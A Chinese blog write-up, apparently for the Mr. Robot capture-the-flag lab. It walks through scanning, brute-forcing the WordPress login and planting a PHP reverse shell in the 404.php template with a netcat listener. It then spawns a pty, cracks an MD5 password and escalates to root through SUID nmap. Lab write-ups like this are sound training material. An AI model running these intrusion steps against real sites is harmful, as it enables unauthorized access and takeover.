mrRobot解题过程

一、靶场环境需要桥接网络

不建议使用校园网,因为使用校园网进行主机探索的时候会出现数不完的主机。

arp-scan -l

若是流量少只能用校园网,便在这里看靶机ip

二、端口扫描

我习惯用fscan了(需要自己安装),你们用nmap也一样的

fscan -h ip
nmap -sS ip

三、开始找线索

访问网页,所有流程走一下,并没有发现什么有用的东西。

进行目录扫描

我用的是dirsearch(需要自己安装),用dirb也能扫出来

dirsearch -u http://xxx.xxx.xxx
dirb http://xxx.xxx.xxx

访问robots.txt, 发现两个文件,其中根据key-1-of-3.txt文件名可以知道有三个flag,而这是第一个。

访问key-1-of-3.txt

访问fsocity.dic发现是一个字典(可以先留着)

访问wp-admin页面

弱口令无效,使用之前找到的字典,对用户名进行爆破。

字典有八十多万个,而用户名却在最后几个(有点ex人),用户名为elliot

接着对系统进行指纹扫描,不出意外是WordPress(因为有很多wp)

nikto -h +靶机ip

使用wpscan进行密码破解,还是用那个字典

还是要爆破很久,密码为ER28-0652

四、漏洞发现及利用

发现在Appearance下的Editor处存在代码编辑的功能,我们选择编辑404.php

 将kali下的反弹shell代码复制出来替换404.php的内容(记得保存)

cd /usr/share/webshells/php

cat php-reverse-shell.php

记得ip和端口要改成kali的ip和监听的端口

kali使用nc监听,要对应404.php里的端口

nc lvp 8888

访问404.php

发现kali已经连接上了

使用命令优化终端

python -c  'import pty;pty.spawn("/bin/sh")'

 进入home,发现robot用户

发现第发现robot的密码,使用MD5解密

进入robot用户,拿到第二个flag

su robot
abcdefghijklmnopqrstuvwxyz

 

 五、提高权限

 (查找有SUID权限的文件)

find / -perm -4000 2>/dev/null 

使用nmap进行提权

nmap --interactive

!sh

查找第三个flag

find / -name key-3-of-3.txt

 

 结束!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值